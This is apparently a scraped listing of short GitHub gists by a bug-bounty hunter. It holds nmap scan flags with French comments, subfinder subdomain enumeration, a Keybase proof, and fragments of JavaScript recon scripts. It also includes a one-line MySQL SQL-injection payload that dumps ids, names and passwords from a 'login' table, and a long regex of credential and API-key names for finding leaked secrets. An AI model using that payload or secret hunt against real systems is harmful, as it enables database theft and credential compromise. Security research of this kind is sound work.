0xh7ml

scan target for pentest   
nmap -PN -n -A -sS -p- -oN output.nmap <IP>  
-Pn : no ping check (host is up),  
-n no dns resolution  
-A : detect systeme info  
-sT : tcp connect [laisse des traces dans les logs serveurs] (moins impactant que -sS Syn, ne laisse pas de trace dans les logs par defaut)  
-p- : port de 0-65535  
-oN output.nmap : write utput to file 

ajouter un scan udp en parallèle -sU (dns, ipsec ...)

0xh7ml

Technology

Subdomain Enumeration:


# Basic usage
subfinder -d example.com > example.com.subs

# Recursive
subfinder -d  example.com  -recursive -silent -t 200 -v -o  example.com.subs

0xh7ml

Keybase proof

I hereby claim:

• I am 0xh7ml on github.
• I am 0xsasuke (https://keybase.io/0xsasuke) on keybase.
• I have a public key ASCn_XJwTD3ILHr_j5XvOWzpyj4Wmt2LLtn2FkfmhdxElAo

To claim this, I am signing this object:

0xh7ml

#!/bin/bash
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin

def js(domain):
    session = requests.Session()
    session.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
    html = session.get(domain).content
    soup = bs(html, "html.parser")

0xh7ml

.
..
........
@
*
*.*
*.*.*
🐎

0xh7ml

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

• The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

0xh7ml

# requirements:
# gf -> https://github.com/tomnomnom/gf
# gf patterns to find leaked tokens and secrets -> https://github.com/emadshanab/Gf-Patterns-Collection
# subjs -> https://github.com/lc/subjs
# gau -> https://github.com/lc/gau
# nuclei -> https://github.com/projectdiscovery/nuclei
# hakcheckurl -> https://github.com/hakluke/hakcheckurl

# note: before you run the script, edit your gf patterns and remove all grep 'H' and 'n' flag and add the 'h' flag

0xh7ml

#! /bin/bash

## This script fetch js files from a domain name and make a wordlist by words in js files
## Credit: https://gist.github.com/aufzayed/6cabed910c081cc2f2186cd27b80f687

##### Install requirements #####
##### Before running this script you should install Go #####

## Install subjs (https://github.com/lc/subjs)
GO111MODULE=on go get -u -v github.com/lc/subjs

0xh7ml

(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(login)WHERE(@x)IN(@x:=CONCAT(0x20,@x,id,0x3a3a,name,0x3a3a,pass,0x3c62723e))))x)

0xh7ml

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k